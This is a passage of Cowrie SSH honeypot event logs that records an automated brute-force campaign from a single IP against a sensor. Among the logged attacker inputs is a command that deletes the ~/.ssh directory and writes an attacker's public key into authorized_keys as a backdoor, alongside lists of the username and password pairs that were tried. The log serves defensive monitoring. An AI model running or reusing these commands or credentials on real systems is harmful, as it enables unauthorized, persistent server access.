],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:18.441137Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@Password","message":"login attempt [root/Admin@Password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:54:19.330424Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:54:19.794641Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:54:19.795441Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:54:19.796588Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:20.022126Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:54:20.572720Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:54:20.573410Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:54:20.800446Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:20.801483Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49094,"dst_ip":"1.2.3.4","dst_port":22,"session":"69afd9cbf3c1","protocol":"ssh","message":"New connection: 212.227.235.229:49094 (1.2.3.4:22) [session: 69afd9cbf3c1]","sensor":"my-vps","timestamp":"2025-09-09T01:54:21.033499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:21.034453Z","src_ip":"212.227.235.229","session":"69afd9cbf3c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:21.267472Z","src_ip":"212.227.235.229","session":"69afd9cbf3c1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:54:22.203177Z","src_ip":"212.227.235.229","session":"69afd9cbf3c1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:23.440529Z","src_ip":"212.227.235.229","session":"69afd9cbf3c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49102,"dst_ip":"1.2.3.4","dst_port":22,"session":"192c53be03c9","protocol":"ssh","message":"New connection: 212.227.235.229:49102 (1.2.3.4:22) [session: 192c53be03c9]","sensor":"my-vps","timestamp":"2025-09-09T01:54:23.667361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:23.668551Z","src_ip":"212.227.235.229","session":"192c53be03c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:23.895266Z","src_ip":"212.227.235.229","session":"192c53be03c9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:54:24.812819Z","src_ip":"212.227.235.229","session":"192c53be03c9"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:25.042360Z","src_ip":"212.227.235.229","session":"dbeea0bdacc7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:25.043648Z","src_ip":"212.227.235.229","session":"192c53be03c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45250,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c842d6b7a36","protocol":"ssh","message":"New connection: 212.227.235.229:45250 (1.2.3.4:22) [session: 5c842d6b7a36]","sensor":"my-vps","timestamp":"2025-09-09T01:54:25.830530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:25.831676Z","src_ip":"212.227.235.229","session":"5c842d6b7a36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:26.084358Z","src_ip":"212.227.235.229","session":"5c842d6b7a36"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T01:54:27.137099Z","src_ip":"212.227.235.229","session":"5c842d6b7a36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46604,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cb1f82737f4","protocol":"ssh","message":"New connection: 212.227.235.229:46604 (1.2.3.4:22) [session: 0cb1f82737f4]","sensor":"my-vps","timestamp":"2025-09-09T01:54:27.693003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:27.694880Z","src_ip":"212.227.235.229","session":"0cb1f82737f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:27.958807Z","src_ip":"212.227.235.229","session":"0cb1f82737f4"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:28.391316Z","src_ip":"212.227.235.229","session":"5c842d6b7a36"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch@123","message":"login attempt [elasticsearch/elasticsearch@123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:54:29.054185Z","src_ip":"212.227.235.229","session":"0cb1f82737f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42702,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e4f5386997e","protocol":"ssh","message":"New connection: 212.227.235.229:42702 (1.2.3.4:22) [session: 9e4f5386997e]","sensor":"my-vps","timestamp":"2025-09-09T01:54:29.879366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:29.880100Z","src_ip":"212.227.235.229","session":"9e4f5386997e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:30.149917Z","src_ip":"212.227.235.229","session":"9e4f5386997e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:30.320652Z","src_ip":"212.227.235.229","session":"0cb1f82737f4"}
{"eventid":"cowrie.login.failed","username":"bob","password":"bob","message":"login attempt [bob/bob] failed","sensor":"my-vps","timestamp":"2025-09-09T01:54:31.269367Z","src_ip":"212.227.235.229","session":"9e4f5386997e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:32.541832Z","src_ip":"212.227.235.229","session":"9e4f5386997e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37700,"dst_ip":"1.2.3.4","dst_port":22,"session":"08a2230e3510","protocol":"ssh","message":"New connection: 212.227.235.229:37700 (1.2.3.4:22) [session: 08a2230e3510]","sensor":"my-vps","timestamp":"2025-09-09T01:54:46.072628Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:54:46.073794Z","src_ip":"212.227.235.229","session":"08a2230e3510"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:54:46.305646Z","src_ip":"212.227.235.229","session":"08a2230e3510"}
{"eventid":"cowrie.login.failed","username":"builder","password":"builder.123","message":"login attempt [builder/builder.123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:54:47.273458Z","src_ip":"212.227.235.229","session":"08a2230e3510"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:54:48.508440Z","src_ip":"212.227.235.229","session":"08a2230e3510"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39866,"dst_ip":"1.2.3.4","dst_port":22,"session":"303eb80890ac","protocol":"ssh","message":"New connection: 212.227.235.229:39866 (1.2.3.4:22) [session: 303eb80890ac]","sensor":"my-vps","timestamp":"2025-09-09T01:55:16.147382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:16.151953Z","src_ip":"212.227.235.229","session":"303eb80890ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:17.362592Z","src_ip":"212.227.235.229","session":"303eb80890ac"}
{"eventid":"cowrie.login.failed","username":"webguest","password":"Password123","message":"login attempt [webguest/Password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:55:18.774772Z","src_ip":"212.227.235.229","session":"303eb80890ac"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:20.031490Z","src_ip":"212.227.235.229","session":"303eb80890ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59046,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b8c211a9735","protocol":"ssh","message":"New connection: 212.227.235.229:59046 (1.2.3.4:22) [session: 3b8c211a9735]","sensor":"my-vps","timestamp":"2025-09-09T01:55:27.797351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:27.798356Z","src_ip":"212.227.235.229","session":"3b8c211a9735"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:55:28.037987Z","src_ip":"212.227.235.229","session":"3b8c211a9735"}
{"eventid":"cowrie.login.failed","username":"builder","password":"builder.123","message":"login attempt [builder/builder.123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:55:29.031254Z","src_ip":"212.227.235.229","session":"3b8c211a9735"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:55:30.271707Z","src_ip":"212.227.235.229","session":"3b8c211a9735"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41964,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d01db48099a","protocol":"ssh","message":"New connection: 212.227.235.229:41964 (1.2.3.4:22) [session: 0d01db48099a]","sensor":"my-vps","timestamp":"2025-09-09T01:55:34.272763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:55:34.273540Z","src_ip":"212.227.235.229","session":"0d01db48099a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"ma